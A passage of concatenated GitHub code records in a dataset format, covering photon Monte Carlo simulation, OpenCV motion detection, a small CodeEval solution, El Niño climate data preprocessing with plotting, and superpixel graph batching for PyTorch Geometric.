-sin_theta*cos_phi*temp + muz*cos_theta # muz'\n ])\n else: # use this to avoid division by zero\n new_dir = np.array([\n sin_theta * cos_phi, # mux\n sin_theta * sin_phi, # muy\n cos_theta * np.sign(muz) # muz\n ])\n \n self.direction = new_dir # update direction \n # return new_dir\n \n def specular(self, tissue1, tissue2):\n \"\"\"\n To be used at the surface, when there is a refracting index mismatch\n\n Parameters\n ----------\n tissue1 : LAYER OBJECT\n An instance of the Layer class representing the outside tissue layer.\n tissue2 : LAYER OBJECT\n An instance of the Layer class representing the incident tissue layer.\n\n Returns\n -------\n None.\n \"\"\"\n Rsp = (tissue1.n - tissue2.n)**2/(tissue1.n + tissue2.n)**2 # specular reflection\n self.weigth -= Rsp # update weigth\n return Rsp # needs to be added to total reflection\n \n def fresnel(self, tissue1, tissue2):\n \"\"\"\n Determine if photon is reflected or refracted at the boundary between two tissues\n and update the direction.\n\n Parameters\n ----------\n tissue1 : LAYER OBJECT\n An instance of the Layer class representing the current tissue layer.\n tissue2 : LAYER OBJECT\n An instance of the Layer class representing the incident tissue layer.\n\n Returns\n -------\n mode : STRING\n Either 'reflect' or 'transmit'\n \"\"\"\n top_layer = max((tissue1, tissue2), key=attrgetter('order')) # find top layer\n ai = top_layer.incident(self)\n # Check for total internal reflection\n if tissue1.n > tissue2.n and ai > np.arcsin(tissue2.n/tissue1.n):\n Ri = 1 # internal reflection\n elif tissue1.n == tissue2.n: # matched reflection index\n Ri = 0 # transmit with same direction\n else:\n at = np.arcsin(tissue1.n/tissue2.n * np.sin(ai)) # Snell law, transmission angle\n Ri = 0.5*( np.sin(ai-at)**2/np.sin(ai+at)**2 + np.tan(ai-at)**2/np.tan(ai+at)**2 ) \n # Randomly determine if reflect or transmit\n norm = top_layer.normal(self) # assume the photon is on the boundary\n if np.random.rand() < Ri: # reflect\n new_dir = -2*norm * self.direction.copy() + self.direction.copy()\n mode = 'reflect'\n else: # transmit\n k = np.sqrt(1 - tissue1.n**2/tissue2.n**2 * (1 - np.cos(ai)**2)) - tissue1.n/tissue2.n * np.cos(ai)\n if k is None:\n print('k is None') # debug\n if norm is None:\n print('norm is None') # debug\n if self.direction is None:\n print('dir is None') # DEBUG\n \n if tissue1.n <= tissue2.n:\n new_dir = k*norm + self.direction * tissue1.n/tissue2.n\n else:\n new_dir = -k*norm + self.direction * tissue1.n/tissue2.n\n # new_dir = k*norm + self.direction * tissue1.n/tissue2.n\n mode = 'transmit'\n \n # new_dir = self.direction # DEBUG\n # mode = 'transmit' # DEBUG \n self.direction = new_dir\n return mode\n \n def roulette(self, r=10):\n \"\"\"\n Randomly terminate photons if weigth is small enough or pathlength is long enough.\n\n Parameters\n ---------- \n r : INT\n The photon have 1/r chance to survive the roulette. If it survives,\n the weigth is increased r times.\n\n Returns\n -------\n None.\n \"\"\"\n RNG = np.random.randint(1, r+1)\n if RNG == r: # the photon survives\n self.weigth *= r\n else: # the photon is terminated\n self.weigth = 0 # maybe it is not necessary \n self.dead = True\n return\n \n def find_layer(self, tissues):\n \"\"\"\n Find the index of the current layer.\n \n Parameters\n ----------\n tissues : LIST of LAYER objects\n An ordered list that contains the geometry\n\n Returns\n -------\n idx : INT\n index of the current layer\n \"\"\"\n for idx, tissue in enumerate(tissues):\n if tissue.is_inside(self.coordinates):\n return idx # should stop at the first true value","repo_name":"nikelui/MCpython","sub_path":"MCphoton.py","file_name":"MCphoton.py","file_ext":"py","file_size_in_byte":7932,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"32238150373","text":"import cv2\nimport numpy as np\n\nbs = cv2.createBackgroundSubtractorKNN(detectShadows = True)\ncamera = cv2.VideoCapture(\"movie.mpg\")\n\nwhile True:\n ret, frame = camera.read()\n fgmask = bs.apply(frame)\n th = cv2.threshold(fgmask.copy(), 244, 255, cv2.THRESH_BINARY)[1]\n th = cv2.erode(th, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3,3)), iterations = 2)\n dilated = cv2.dilate(th, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (8,3)), iterations = 2)\n image, contours, hier = cv2.findContours(dilated, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n for c in contours:\n if cv2.contourArea(c) > 1000:\n (x,y,w,h) = cv2.boundingRect(c)\n cv2.rectangle(frame, (x,y), (x+w, y+h), (255, 255, 0), 2)\n\n cv2.imshow(\"mog\", fgmask)\n cv2.imshow(\"thresh\", th)\n cv2.imshow(\"diff\", frame & cv2.cvtColor(fgmask, cv2.COLOR_GRAY2BGR))\n cv2.imshow(\"detection\", frame)\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\ncamera.release()\ncv2.destroyAllWindows()\n","repo_name":"Ewenwan/MVision","sub_path":"opencv_app/python/object_tracker/mog.py","file_name":"mog.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":7392,"dataset":"github-code","pt":"54"} +{"seq_id":"9808755525","text":"import sys\n\ninput = open(sys.argv[1], 'r')\n\nlines = []\nm = []\n\nfor l in input:\n line = l.split(' ')\n m.append(int(line[-1]))\n lines.append(line[:-1])\n\ninput.close()\n\nfor i in xrange(len(lines)):\n if m[i] > len(lines[i]):\n continue\n sys.stdout.write(lines[i][-m[i]])\n if i != len(lines)-1:\n sys.stdout.write('\\n')\n","repo_name":"michaelrbock/codeeval","sub_path":"moderate/mth_to_last_element.py","file_name":"mth_to_last_element.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35446776933","text":"import matplotlib.pyplot as plt\nimport torch as th\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision\nimport xarray as xr\nimport numpy as np\nimport nc_time_axis\nimport sys\nimport time\nimport random\nimport statistics\nimport preproc\nfrom torch.utils.data import Dataset, DataLoader\nfrom einops.layers.torch import Reduce\nfrom preproc import Normalizer\nfrom collections import Counter\n\n# For faster computation if CUDA is available\ndevice = 'cuda' if th.cuda.is_available() else 'cpu'\n\n# for saving plots and models\ntau_to_use = 3\ntime_of_script_runs = 0\n\n# current model being used (either with or without dropout layer)\n# current_adam_model = \"drop\"\ncurrent_adam_model = \"nodrop\"\n\n\n# ----------------------------------------------------------------------\n# CODE FOR DATASET\n\n# preprocessing, generating dataset to be used for DataLoaders\nclass ElNinoData(Dataset):\n def __init__(self, file, var_label='ts', lat_range: tuple = (-90, 90), lon_range: tuple = (-180, 180),\n tau: int = 1):\n '''\n file: path to netcdf file\n var_label: variable label in netcdf file\n lat_range: latitude range for data\n lon_range: longitude range for data\n tau: number of time steps to predict\n '''\n # open dataset\n self.ds = xr.open_dataset(file)[var_label]\n\n # ----------------------------------------------\n # SHOW WHOLE WORLD AS SST + MASKED\n # rand_picked_time = random.randint(0, 14399)\n # world_plot = self.ds.isel(time=7862)\n # print(world_plot)\n # ax = plt.axes()\n # world_plot.plot(cmap=\"coolwarm\")\n # ax.set_title('')\n # plt.show()\n #\n # f_lsm = \"./data/sftlf_fx_CESM2_historical_r1i1p1f1.nc\"\n # # Get lsm for loss masking of big cutout\n # land_area_mask = preproc.process_data(\n # f_lsm, ['sftlf'],\n # lon_range=(-180, 179),\n # lat_range=(-90, 90),\n # climatology=None,\n # shortest=False,\n # )['sftlf']\n # print(land_area_mask)\n # lsm = th.from_numpy(land_area_mask.where(land_area_mask == 0, 1).data)\n # # set mask for big cutout\n # world_masked = world_plot.where(lsm == 0.0)\n # ax = plt.axes()\n # world_masked.plot(cmap=\"coolwarm\")\n # ax.set_title('')\n # plt.show()\n #\n #\n # # NINO 3.4 CUTOUT ANOMALY\n # small_nino34_cutout = self.ds.sel(time=slice(\"0641-01-15\", \"0670-12-15\"), lat=slice(-5, 5), lon=slice(-170, -120))\n # small_nino34_cutout = small_nino34_cutout.groupby('time.month') - small_nino34_cutout.groupby('time.month').mean(dim=\"time\")\n # small_nino34_cutout = small_nino34_cutout.sel(time=\"0656-03-15\")\n # small_nino34_cutout = th.tensor(small_nino34_cutout.data, dtype=th.float32)\n # fig = plt.figure()\n # plt.pcolor(small_nino34_cutout.squeeze(), cmap=\"coolwarm\", vmin=-2, vmax=2)\n # plt.colorbar()\n # plt.show()\n #\n #\n # # BIG CUTOUT ANOMALY + MASKED\n # big_nino34_cutout = self.ds.sel(\n # lon=self.ds.lon[(self.ds.lon < min(lon_range)) |\n # (self.ds.lon > max(lon_range))],\n # lat=slice(np.min(lat_range), np.max(lat_range)))\n # big_nino34_cutout = big_nino34_cutout.roll(lon=39, roll_coords=True)\n # land_area_mask = preproc.process_data(\n # f_lsm, ['sftlf'],\n # lon_range=lon_range,\n # lat_range=lat_range,\n # climatology=None,\n # shortest=True,\n # )['sftlf']\n # land_area_mask = land_area_mask.roll(lon=39, roll_coords=True)\n # lsm = th.from_numpy(land_area_mask.where(land_area_mask == 0, 1).data)\n # big_nino34_cutout_masked = big_nino34_cutout.where(lsm == 0.0)\n #\n # big_nino34_cutout_masked = big_nino34_cutout_masked.sel(time=slice(\"0641-01-15\", \"0670-12-15\"))\n # big_nino34_cutout_masked = big_nino34_cutout_masked.groupby(\"time.month\") - big_nino34_cutout_masked.groupby('time.month').mean(dim=\"time\")\n # big_nino34_cutout_masked = big_nino34_cutout_masked.sel(time=\"0656-03-15\")\n # big_nino34_cutout = big_nino34_cutout.sel(time = slice(\"0641-01-15\", \"0670-12-15\"))\n # big_nino34_cutout = big_nino34_cutout.groupby(\"time.month\") - big_nino34_cutout.groupby('time.month').mean(dim=\"time\")\n # big_nino34_cutout = big_nino34_cutout.sel(time=\"0656-03-15\")\n # big_nino34_cutout = th.tensor(big_nino34_cutout.data, dtype=th.float32)\n # fig = plt.figure()\n # plt.pcolor(big_nino34_cutout.squeeze(), cmap=\"coolwarm\", vmin=-2, vmax=2)\n # plt.colorbar()\n # plt.show()\n # big_nino34_cutout_masked = th.tensor(big_nino34_cutout_masked.data, dtype=th.float32)\n # fig = plt.figure()\n # plt.pcolor(big_nino34_cutout_masked.squeeze(), cmap=\"coolwarm\", vmin=-2, vmax=2)\n # plt.colorbar()\n # plt.show()\n #\n # # nino34 cutout\n # self.ds_nino34 = self.ds.sel(lat=slice(-5, 5), lon=slice(-170, -120))\n #\n # # normalize nino 34\n # self.normalizer = Normalizer(method='zscore')\n # self.ds_nino34 = self.normalizer.fit_transform(self.ds_nino34)\n # self.ds_nino34.attrs = {'normalizer': self.normalizer}\n # small_nino34_cutout = self.ds_nino34.isel(time=7862)\n # small_nino34_cutout = th.tensor(small_nino34_cutout.data, dtype=th.float32)\n # fig = plt.figure()\n # plt.pcolor(small_nino34_cutout.squeeze(), cmap=\"coolwarm\")\n # plt.axis('off')\n # plt.show()\n #\n #\n # sys.exit()\n # ----------------------------------------------\n\n startingclock = time.time()\n climatology = self.ds.groupby('time.month').mean(dim='time')\n anomstart = self.ds.groupby('time.month') - climatology\n\n tsa_nino34 = anomstart.sel(lat=slice(-5, 5), lon=slice(-170, -120))\n nino34_index = tsa_nino34.mean(dim=['lat', 'lon'])\n nino34_index = nino34_index.rolling(time=5, center=True, min_periods=1).mean()\n print(f'Time it took to compute anomalies and nino 3.4 index : {time.time() - startingclock}')\n\n idx_lanina = np.where(nino34_index.data <= -0.5)[0]\n idx_elnino = np.where(nino34_index.data >= 0.5)[0]\n idx_neutral = np.where((nino34_index.data > -0.5) & (nino34_index.data < 0.5))[0]\n\n print('All Labeled Data Events within Dataset :')\n print(f'La Nina Events : [{len(idx_lanina)}/14400]{100. * len(idx_lanina) / 14400}')\n print(f'Neutral Events : [{len(idx_neutral)}/14400]{100. * len(idx_neutral) / 14400}')\n print(f'El Nino Events : [{len(idx_elnino)}/14400]{100. * len(idx_elnino) / 14400}\\n')\n\n lanina_mean = anomstart.isel(time=idx_lanina).mean(dim='time')\n neutral_mean = anomstart.isel(time=idx_neutral).mean(dim='time')\n elnino_mean = anomstart.isel(time=idx_elnino).mean(dim='time')\n lanina_mean34 = tsa_nino34.isel(time=idx_lanina).mean(dim='time')\n neutral_mean34 = tsa_nino34.isel(time=idx_neutral).mean(dim='time')\n elnino_mean34 = tsa_nino34.isel(time=idx_elnino).mean(dim='time')\n\n fig = plt.figure(figsize=(14, 10))\n lanina_mean.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized La Niña events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n neutral_mean.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized Neutral events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n elnino_mean.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized El Niño events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n lanina_mean34.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized La Niña events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n neutral_mean34.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized Neutral events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n elnino_mean34.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized El Niño events\")\n plt.show()\n\n\n # tsa_bigcutout = anomstart.sel(\n # lon=anomstart.lon[(anomstart.lon < min(lon_range)) |\n # (anomstart.lon > max(lon_range))],\n # lat=slice(np.min(lat_range), np.max(lat_range)))\n # tsa_bigcutout = tsa_bigcutout.roll(lon=39, roll_coords=True)\n # print(tsa_bigcutout)\n #\n # lanina_mean_big = th.tensor(tsa_bigcutout.isel(time=idx_lanina).mean(dim='time').data, dtype=th.float32)\n # neutral_mean_big = th.tensor(tsa_bigcutout.isel(time=idx_neutral).mean(dim='time').data, dtype=th.float32)\n # elnino_mean_big = th.tensor(tsa_bigcutout.isel(time=idx_elnino).mean(dim='time').data, dtype=th.float32)\n\n # fig = plt.figure(figsize=(14, 10))\n # plt.pcolor(lanina_mean_big, cmap='coolwarm')\n # fig.suptitle(\"Mean of all categorized La Niña events\")\n # plt.savefig(f\"./plots_and_whatnots/lanina_plot{time_of_script_runs+2}.png\")\n #\n # fig = plt.figure(figsize=(14, 10))\n # neutral_mean_big.plot(cmap='coolwarm')\n # fig.suptitle(\"Mean of all categorized Neutral events\")\n # plt.savefig(f\"./plots_and_whatnots/neutral_plot{time_of_script_runs+2}.png\")\n #\n # fig = plt.figure(figsize=(14, 10))\n # elnino_mean_big.plot(cmap='coolwarm')\n # fig.suptitle(\"Mean of all categorized El Niño events\")\n # plt.savefig(f\"./plots_and_whatnots/elnino_plot{time_of_script_runs+2}.png\")\n sys.exit()\n\n\n # select cutouts\n # big cutout -31,32 130,-70\n self.ds_big = self.ds.sel(\n lon=self.ds.lon[(self.ds.lon < min(lon_range)) |\n (self.ds.lon > max(lon_range))],\n lat=slice(np.min(lat_range), np.max(lat_range)))\n # orders big cutout for easier plots\n self.ds_big = self.ds_big.roll(lon=39, roll_coords=True)\n\n # nino34 cutout\n self.ds_nino34 = self.ds.sel(lat=slice(-5, 5), lon=slice(-170, -120))\n\n\n # normalize nino 34\n startingclock = time.time()\n self.normalizer = Normalizer(method='zscore')\n self.ds_nino34 = self.normalizer.fit_transform(self.ds_nino34)\n self.ds_nino34.attrs = {'normalizer': self.normalizer}\n\n # normalize big cutout\n self.ds_big = self.normalizer.fit_transform(self.ds_big)\n self.ds_big.attrs = {'normalizer': self.normalizer}\n print(f'Time it took only to normalize cutouts : {time.time() - startingclock}')\n\n\n # MASKING\n f_lsm = \"./data/sftlf_fx_CESM2_historical_r1i1p1f1.nc\"\n # Get lsm for loss masking of big cutout\n land_area_mask = preproc.process_data(\n f_lsm, ['sftlf'],\n lon_range=lon_range,\n lat_range=lat_range,\n climatology=None,\n )['sftlf']\n land_area_mask = land_area_mask.roll(lon=39, roll_coords=True)\n lsm = th.from_numpy(land_area_mask.where(land_area_mask == 0, 1).data)\n # set mask for big cutout\n self.ds_big_masked = self.ds_big.where(lsm == 0.0)\n self._plot_mean(self.ds_big_masked, labels_list)\n #self._plot_mean(self.ds_nino34, labels_list)\n\n\n self.data = th.tensor(self.ds_big_masked.data, dtype=th.float32)\n # plot first twelve months\n fig, axs = plt.subplots(nrows=4, ncols=3, sharex=True, sharey=True)\n fig.suptitle(\"First twelve months, their classes and nino 3.4 index values\")\n counter = 0\n for i in range(0, 4):\n for j in range(0, 3):\n temp_plot = axs[i, j].pcolor(self.data[counter], cmap=\"coolwarm\", vmin=-2, vmax=2)\n fig.colorbar(temp_plot, ax=axs[i, j])\n if labels_list[counter] == 2:\n axs[i, j].set_title(\"El Nino, {:.2f}\".format(nino34_index[counter]))\n elif labels_list[counter] == 1:\n axs[i, j].set_title(\"Neutral, {:.2f}\".format(nino34_index[counter]))\n elif labels_list[counter] == 0:\n axs[i, j].set_title(\"La Nina, {:.2f}\".format(nino34_index[counter]))\n counter += 1\n plt.tight_layout()\n #plt.show()\n\n\n self.data = th.tensor(self.ds_nino34.data, dtype=th.float32)\n # plot first twelve months\n fig, axs = plt.subplots(nrows=4, ncols=3, sharex=True, sharey=True)\n fig.suptitle(\"First twelve months, their classes and nino 3.4 index values\")\n counter = 0\n for i in range(0, 4):\n for j in range(0, 3):\n temp_plot = axs[i, j].pcolor(self.data[counter], cmap=\"coolwarm\", vmin=-2, vmax=2)\n fig.colorbar(temp_plot, ax=axs[i, j])\n if labels_list[counter] == 2:\n axs[i, j].set_title(\"El Nino, {:.2f}\".format(nino34_index[counter]))\n elif labels_list[counter] == 1:\n axs[i, j].set_title(\"Neutral, {:.2f}\".format(nino34_index[counter]))\n elif labels_list[counter] == 0:\n axs[i, j].set_title(\"La Nina, {:.2f}\".format(nino34_index[counter]))\n counter += 1\n plt.tight_layout()\n #plt.show()\n\n # function that calculates mean and anomalies of given darray\n def _compute_anomalies_nino34(self, darray):\n\n # list of all computed nino34 years and months\n labels_list = []\n\n # first and last year of dataset\n time_start_year = darray['time'].data.min().year\n time_end_year = darray['time'].data.max().year\n time_step_size = 1\n\n # iterate over all years\n for x in range(time_start_year, time_end_year + (time_step_size * 2), time_step_size):\n\n # Code to fill the string to the 0001-1200 year format\n time_start = str(x)\n start_len = len(time_start)\n time_end = str(x + 30)\n end_len = len(time_end)\n\n if start_len < 4:\n while (start_len < 4):\n time_start = \"0\" + time_start\n start_len = len(time_start)\n\n if end_len < 4:\n while (end_len < 4):\n time_end = \"0\" + time_end\n end_len = len(time_end)\n\n # edge case so it doesn't do the last 30 years in smaller increments\n if int(time_end) == 1201:\n time_start = time_start + \"-01-15\"\n time_end = \"1201-01-05\"\n else:\n time_start = time_start + \"-01-15\"\n time_end = time_end + \"-01-05\"\n\n timeslice_30y = darray.sel(time=slice(time_start, time_end))\n\n\n climatology = timeslice_30y.groupby('time.month').mean(dim='time')\n anom = timeslice_30y.groupby('time.month') - climatology\n\n # edge case so it doesn't do the last 30 years in smaller increments\n if time_end == \"1201-01-05\":\n for i in range(0, len(anom.data)):\n labels_list.append(anom.data[i])\n break\n\n sliced_data = anom.data[0:12]\n for i in range(0, len(sliced_data)):\n labels_list.append(sliced_data[i])\n\n return labels_list\n\n # function that categorizes given anomalies to Nino 3.4 Index standard\n def _label_data(self, darray, anomalies):\n\n elnino_class_counter = 0\n neutral_class_counter = 0\n lanina_class_counter = 0\n\n # list of all labeled nino34 events within time span (1200 years)\n labels_list = []\n\n # categorize anomalies as El Nino (2), Neutral (1) or La Nina (0)\n for i in anomalies:\n if i > 0.5:\n labels_list.append(2)\n elnino_class_counter += 1\n elif i < -0.5:\n labels_list.append(0)\n lanina_class_counter += 1\n else:\n labels_list.append(1)\n neutral_class_counter += 1\n print('All Labeled Data Events within Dataset :')\n print(f'La Nina Events : [{lanina_class_counter}/14400]{100. * lanina_class_counter / 14400}')\n print(f'Neutral Events : [{neutral_class_counter}/14400]{100. * neutral_class_counter / 14400}')\n print(f'El Nino Events : [{elnino_class_counter}/14400]{100. * elnino_class_counter / 14400}\\n')\n return labels_list\n\n def _plot_mean(self, darray, labels_list):\n\n # get index of all elnino events\n elnino_indices = [i for i, x in enumerate(labels_list) if x == 2]\n # get index of all elnino events\n neutral_indices = [i for i, x in enumerate(labels_list) if x == 1]\n # get index of all elnino events\n lanina_indices = [i for i, x in enumerate(labels_list) if x == 0]\n\n # plot elnino mean\n ind_elnino = xr.DataArray(elnino_indices, dims=[\"time\"])\n elnino_da = darray[ind_elnino]\n elnino_da = elnino_da.mean(dim=\"time\")\n elnino_tensor = th.tensor(elnino_da.data, dtype=th.float32)\n fig = plt.figure(figsize=(14, 10))\n fig.suptitle(\"The mean of all labeled El Nino Events\")\n plt.pcolor(elnino_tensor, cmap=\"coolwarm\", vmin=-2, vmax=2)\n plt.colorbar()\n plt.show()\n\n # plot neutral mean\n ind_neutral = xr.DataArray(neutral_indices, dims=[\"time\"])\n neutral_da = darray[ind_neutral]\n neutral_da = neutral_da.mean(dim=\"time\")\n neutral_tensor = th.tensor(neutral_da.data, dtype=th.float32)\n fig = plt.figure(figsize=(14, 10))\n fig.suptitle(\"The mean of all labeled Neutral Events\")\n plt.pcolor(neutral_tensor, cmap=\"coolwarm\", vmin=-2, vmax=2)\n plt.colorbar()\n plt.show()\n\n # plot lanina mean\n ind_lanina = xr.DataArray(lanina_indices, dims=[\"time\"])\n lanina_da = darray[ind_lanina]\n lanina_da = lanina_da.mean(dim=\"time\")\n lanina_tensor = th.tensor(lanina_da.data, dtype=th.float32)\n fig = plt.figure(figsize=(14, 10))\n fig.suptitle(\"The mean of all labeled La Nina Events\")\n plt.pcolor(lanina_tensor, cmap=\"coolwarm\", vmin=-2, vmax=2)\n plt.colorbar()\n plt.show()\n\n def __len__(self):\n return self.data.shape[1] - 1\n\n def __getitem__(self, idx):\n if idx + self.tau > (self.data.shape[1] - 1):\n return self.data[:, idx], self.nino_label_list[(self.data.shape[1] - 1)]\n return self.data[:, idx], self.nino_label_list[idx + self.tau]\n\n\n# INPUTS FOR DATASET: FILEPATH, VAR_LABEL OF FILE, LAT OF CUTOUT, LON OF CUTOUT, MONTHS TO PREDICT#\nstart_time = time.time()\nfilename = \"./data/ts_Amon_CESM2_piControl_r1i1p1f1.nc\"\nnino34_dataset = ElNinoData(filename, 'ts', (-31, 32), (130, -70), tau_to_use)\n# nino34_dataset = ElNinoData(\"./data/ts_Amon_CESM2_piControl_r1i1p1f1.nc\", 'ts', (-5, 5), (-170, -120), tau_to_use)\nend_time = time.time()\nprint(f'Time it took to prepare dataset : {end_time - start_time}')\nsys.exit()\n","repo_name":"MTRucker/AdversaryDLWPModels","sub_path":"remnants/fixed_ninodataset.py","file_name":"fixed_ninodataset.py","file_ext":"py","file_size_in_byte":19127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21966156786","text":"import os\n\nfrom torch.utils.data import Dataset\nimport subprocess\n\nfrom src.data_handling.DatasetHandler import Splits, SupportedDatasets, get_dataset_dir, is_preprocessed_data_available, make_dataset_available_for_preprocessing\nimport numpy as np\nimport torch\nfrom src.data_handling.GraphData import GraphData\nfrom torch import Tensor\nfrom typing import Dict\nfrom torch_sparse import SparseTensor\nimport psutil\n\n# NOTE: the code below is all vectorised for efficiency and caching of arbitrary transformations is done for efficiency as well\n# so variable names and the operations involved might not be very readable, but the complexity is needed solely for efficiency\n# and the fact that we are constructing and normalising and batching the input for all image graphs at the same time\n\n# generates a tensor that can index a tensor starting from offsets and going up to length\n# used for doing a vectorised select of multiple parts of the image graphs (such as the contour data)\n# Example: offsets: [1,6], lengths: [2,4]\n# Returned: [1,2,6,7,8,9]\ndef get_consecutive_idxs(offsets: Tensor, lengths: Tensor):\n lengths_no_last = lengths[:-1]\n cumsum_query_lengths = torch.cumsum(lengths_no_last,0)\n lengths_total = cumsum_query_lengths[-1]+lengths[-1]\n basis = torch.repeat_interleave(offsets-1,lengths, output_size = lengths_total)\n counting = torch.ones(lengths_total,dtype=torch.long)\n counting[cumsum_query_lengths]=-lengths_no_last+1\n final_idxs=basis+torch.cumsum(counting,0)\n return final_idxs\n\ndef get_data(given_idxs: Tensor, offsets: Tensor, lengths: Tensor, statistics: Tensor, data: Tensor, graph_params: Dict[str, bool]):\n\n idxs=torch.sort(given_idxs)[0]\n query_offsets=torch.index_select(offsets,0,idxs)\n query_lengths = torch.index_select(lengths,0,idxs)\n # all the data for the image graphs corresponding to the given indices\n all_data = torch.index_select(data,0,get_consecutive_idxs(query_offsets, query_lengths))\n \n\n input_idxs_length = idxs.shape[0]\n new_offsets = torch.cat((torch.tensor([0]),torch.cumsum(query_lengths[:-1],0)))\n # getting the data statistics that will inform further fetching and batching\n general_stats = torch.index_select(all_data,0,get_consecutive_idxs(new_offsets, torch.full(idxs.shape,6))).to(torch.long).view(input_idxs_length,6)\n y = general_stats[:,0].contiguous()\n nr_superpixels = general_stats[:,1].contiguous()\n num_edges = general_stats[:,2].contiguous()\n img_height = general_stats[:,3].contiguous()\n img_width = general_stats[:,4].contiguous()\n all_contours_size = general_stats[:,5].contiguous()\n\n double_num_edges = 2*num_edges\n\n node_features_length_addition = 7*nr_superpixels\n shape_length_offset = 6+new_offsets\n biggest_distance_shape_idx_offset = shape_length_offset+nr_superpixels\n node_features_offset = biggest_distance_shape_idx_offset+nr_superpixels\n edges_first_offset = node_features_offset+node_features_length_addition\n edges_second_offset = edges_first_offset+double_num_edges\n\n \n # get the actual data as well\n shape_lengths = torch.index_select(all_data,0,get_consecutive_idxs(shape_length_offset, nr_superpixels)).to(torch.long)\n x = torch.index_select(all_data,0,get_consecutive_idxs(node_features_offset, node_features_length_addition))\n x = x.view(x.shape[0]//7,7)\n used_statistics = statistics.view(statistics.shape[0]//2,2)[[0,1,2,3,4,5,6],:]\n # select superpixel features based on given options\n if not graph_params['use_stddev'] and graph_params['no_size']:\n x = x[:,[1,2,3]]\n used_statistics = used_statistics[[1,2,3],:]\n elif graph_params['use_stddev'] and graph_params['no_size']:\n x = x[:,[1,2,3,4,5,6]]\n used_statistics = used_statistics[[1,2,3,4,5,6],:]\n elif not graph_params['use_stddev'] and not graph_params['no_size']:\n x = x[:,[0,1,2,3]]\n used_statistics = used_statistics[[0,1,2,3],:]\n\n # create the edges in the way desired by the Pytorch Geometric batching\n actual_cumsum_nr_superpixels = torch.cumsum(nr_superpixels,0)\n nr_superpixels_size = actual_cumsum_nr_superpixels[-1]\n inc_edge_index = torch.repeat_interleave(torch.cat((torch.tensor([0]),actual_cumsum_nr_superpixels[:-1])), double_num_edges)\n edge_index_first = torch.index_select(all_data,0,get_consecutive_idxs(edges_first_offset, double_num_edges)).to(torch.long)+inc_edge_index\n edge_index_second = torch.index_select(all_data,0,get_consecutive_idxs(edges_second_offset, double_num_edges)).to(torch.long)+inc_edge_index\n \n\n shapes = torch.index_select(all_data,0,get_consecutive_idxs(edges_second_offset+double_num_edges, all_contours_size*2+nr_superpixels*2))\n actual_cumsum_shape_lengths = torch.cumsum(shape_lengths,0)\n cumsum_shape_lengths = torch.cat((torch.tensor([0]),actual_cumsum_shape_lengths[:-1]))\n double_cumsum_shape_lengths = cumsum_shape_lengths*2\n shape_lengths_shape = shape_lengths.shape[0]\n arange_shape_lengths = torch.arange(shape_lengths_shape)\n\n centroids = torch.index_select(shapes,0,get_consecutive_idxs(double_cumsum_shape_lengths+2*(arange_shape_lengths+shape_lengths), torch.full(double_cumsum_shape_lengths.shape, 2)))\n # create the batch in the way desired by the Pytorch Geometric batching\n batch = torch.repeat_interleave(torch.arange(input_idxs_length),nr_superpixels, output_size=nr_superpixels_size)\n centroids_euclid = centroids.view(shape_lengths_shape,2).contiguous()\n centroid_y = centroids_euclid[:,0]\n centroid_x = centroids_euclid[:,1]\n pos = centroids_euclid\n edge_norm_used_pos = centroids_euclid\n # normalise/convert centroids according to the given options\n if graph_params['norm_centroids'] or graph_params['polar_centroids']:\n centroid_y_diff = centroid_y-torch.repeat_interleave((img_height-1)/2, nr_superpixels, output_size=nr_superpixels_size)\n centroid_x_diff = centroid_x-torch.repeat_interleave((img_width-1)/2, nr_superpixels, output_size=nr_superpixels_size)\n centroid_dist = torch.sqrt(centroid_y_diff**2+(centroid_x_diff)**2)\n centroid_angle = torch.atan2(centroid_y_diff, centroid_x_diff)\n if graph_params['norm_centroids']:\n centroid_dist/=torch.repeat_interleave(torch.sqrt(img_height*img_height+img_width*img_width), nr_superpixels, output_size=nr_superpixels_size)\n edge_norm_used_pos = torch.stack((centroid_dist*torch.sin(centroid_angle), centroid_dist*torch.cos(centroid_angle))).t().contiguous()\n if graph_params['polar_centroids']:\n pos = torch.stack((centroid_dist,(centroid_angle+torch.pi)/(torch.pi*2))).t().contiguous()\n else:\n pos = edge_norm_used_pos\n\n # compute edge weights\n if graph_params['use_edge_weights']:\n edge_attr = (edge_norm_used_pos[edge_index_first]-edge_norm_used_pos[edge_index_second]).pow(2).sum(1).sqrt()\n else:\n edge_attr = None\n\n # always use sparse format to save memory and computation due to the sparsity of the input\n sparse_size = edge_index_first[-1]+1\n adj_t = SparseTensor(row=edge_index_first, col=edge_index_second, value=edge_attr, sparse_sizes=(sparse_size, sparse_size), is_sorted=True, trust_data=True)\n shape_lengths_size = actual_cumsum_shape_lengths[-1]\n\n # for graph of graphs we need to also compute the graphs for the contours\n if graph_params['graph_of_graphs']:\n shape_lengths_plus_one = shape_lengths+1\n shape_lengths_plus_one_size = shape_lengths_size+shape_lengths_shape\n used_shapes = shapes\n edge_norm_used_shapes = shapes\n # normalise node features (which are positions) according to the given options\n if graph_params['normalise_shapes'] or graph_params['polar_shapes'] or graph_params['superpixel_rotation_information']:\n used_shapes = used_shapes.view(shapes.shape[0]//2,2)\n shape_centroids_y = 